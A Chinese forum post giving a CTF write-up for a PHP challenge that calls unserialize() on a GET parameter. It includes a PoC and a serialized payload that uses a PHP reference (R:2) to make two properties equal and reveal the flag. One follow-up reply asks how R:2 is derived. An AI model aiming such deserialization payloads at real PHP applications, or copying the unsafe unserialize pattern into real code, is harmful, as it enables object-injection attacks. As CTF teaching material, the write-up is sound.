CTF-5解题思路

Track-子羽   ·   发表于 2021-11-15 15:35:09   ·   CTF&WP专版

源码

  1. <?php
  2. #GOAL: get the secret;
  3. class just4fun {
  4. var $enter;
  5. var $secret;
  6. }
  7. if (isset($_GET['pass'])) {
  8. $pass = $_GET['pass'];
  9. if(get_magic_quotes_gpc()){
  10. $pass=stripslashes($pass);
  11. }
  12. $o = unserialize($pass);
  13. if ($o) {
  14. $o->secret = "flag{I'm xxxxxxxxxxxxxxxxxxxxxxxxxxxx}";
  15. if ($o->secret === $o->enter)
  16. echo "Congratulation! Here is my secret: ".$o->secret;
  17. else
  18. echo "Oh no... You can't fool me";
  19. }
  20. else echo "are you trolling?";
  21. }
  22. ?>

可以看到存在反序列化$o = unserialize($pass);
需要对pass传参,一个序列化的对象,使其能够满足
$o->secret === $o->enter

POC:

  1. <?php
  2. class just4fun {
  3. var $enter;
  4. var $secret;
  5. }
  6. $pass = new just4fun();
  7. $pass->enter = &$pass->secret;
  8. ?>

payload:

  1. ?pass=O:8:"just4fun":2:{s:5:"enter";N;s:6:"secret";R:2;}

打赏我,让我更有动力~

1 条回复   |  直到 2023-12-11 | 831 次浏览

elephant2023
发表于 2023-12-11

R:2 是怎么来的啊

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.